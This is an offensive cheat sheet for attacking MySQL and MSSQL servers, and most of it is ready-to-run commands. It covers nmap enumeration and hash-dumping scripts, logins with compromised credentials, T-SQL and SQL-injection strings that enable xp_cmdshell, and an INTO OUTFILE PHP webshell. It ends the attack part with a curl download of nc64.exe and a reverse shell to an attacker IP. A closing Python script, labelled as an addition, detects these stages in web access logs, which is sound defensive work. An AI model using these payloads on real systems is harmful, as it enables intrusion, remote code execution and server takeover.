# MYSQL (3306)

## 1. Basics

### Scanning

```
sudo nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
```

### Initiate connection

```
# MySQL client: no space between -p and the password (with a space, mysql treats the next word as the database name)
mysql -h <IP> -u <username> -p<pass> [-P <port>]
# MSSQL / Sybase (TDS) client
sqsh -S <IP> -U <username> -P <password> -D <database>

# For Windows SQL Server instances, authenticating with domain credentials
impacket-mssqlclient <domain>/<compromised username>:<password>@<IP> -windows-auth
```

## 2. Reverse Shell

```
1. Initiate a connection with sqsh or impacket-mssqlclient (the commands below are T-SQL for MSSQL, so the mysql client does not apply)
    # In sqsh, you need to type GO after writing the query to send it
2. Run the commands one by one:

# Get users that can run xp_cmdshell
    USE master
    EXEC sp_helprotect 'xp_cmdshell'

# Check if xp_cmdshell is enabled (value_in_use = 1 means enabled)
    SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
    EXEC sp_configure 'show advanced options', 1
    RECONFIGURE

# This enables xp_cmdshell
    EXEC sp_configure 'xp_cmdshell', 1
    RECONFIGURE
    EXEC master..xp_cmdshell 'whoami'
```

Manual Code Execution:

{% code overflow="wrap" %}

```
# Steps to enable xp_cmdshell through an injection point, one statement per request
    '; EXEC sp_configure "show advanced options", 1; -- //
    '; RECONFIGURE; -- //
    '; EXEC sp_configure "xp_cmdshell", 1; -- //
    '; RECONFIGURE; -- //

    '; EXEC xp_cmdshell "whoami"; -- //

# Oneliner
'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "whoami"; -- //

# URL-encoded oneliner
%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22whoami%22%3B%20%2D%2D%20%2F%2F
```

{% endcode %}

Payload Example:

{% code overflow="wrap" %}

```
# Insert webshell into the web root directory (MySQL; the nulls pad the column count of the UNION SELECT)
    "<?php system($_GET['cmd']);?>", null, null, null INTO OUTFILE "/web/root/directory/webshell.php"

# Initiate a reverse shell with nc64.exe via the injected webshell
    curl http://<IP>/nc64.exe -o c:/windows/temp/nc64.exe
    c:/windows/temp/nc64.exe -e cmd.exe <IP> <port>
```

{% endcode %}
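An added detection example, not part of these notes: it URL-decodes the query string of web access-log lines (double encoding included) and flags the stages of the sequence above, the `sp_configure`/`xp_cmdshell` enablement and an `INTO OUTFILE` webshell drop. The log lines and the `/item.php?id=` endpoint are constructed for the example.

```python
# Added example (not from the original notes): flag the xp_cmdshell enablement
# sequence and INTO OUTFILE webshell drops in URL-encoded web requests.
import re
from urllib.parse import unquote_plus

# One pattern per stage of the procedure documented above.
INDICATORS = {
    "show_advanced_options": re.compile(r"sp_configure\s*['\"]?show\s+advanced\s+options", re.I),
    "xp_cmdshell_enable":    re.compile(r"sp_configure\s*['\"]?xp_cmdshell['\"]?\s*,\s*1", re.I),
    "xp_cmdshell_exec":      re.compile(r"\bxp_cmdshell\b", re.I),
    "into_outfile":          re.compile(r"\binto\s+outfile\b", re.I),
}

def normalize(query_string: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (double encoding is common) and collapse whitespace."""
    s = query_string
    for _ in range(rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return re.sub(r"\s+", " ", s)

def classify(query_string: str) -> list[str]:
    """Return the indicator names matched in one request's query string."""
    text = normalize(query_string)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_log(lines):
    """Yield (line, indicators) for combined-format access-log lines that match."""
    # The request is the quoted "METHOD /path?query HTTP/x" field.
    req = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
    for line in lines:
        m = req.search(line)
        if not m or "?" not in m.group(1):
            continue
        hits = classify(m.group(1).split("?", 1)[1])
        if hits:
            yield line, hits

SAMPLE_LOG = [  # constructed sample lines (second one carries the URL-encoded oneliner above)
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=3 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22whoami%22%3B%20%2D%2D%20%2F%2F HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=1+UNION+SELECT+%22%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29%3B%3F%3E%22%2Cnull+INTO+OUTFILE+%22%2Fvar%2Fwww%2Fhtml%2Fws.php%22 HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for line, hits in scan_log(SAMPLE_LOG):
        print(hits, line[:60])
```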

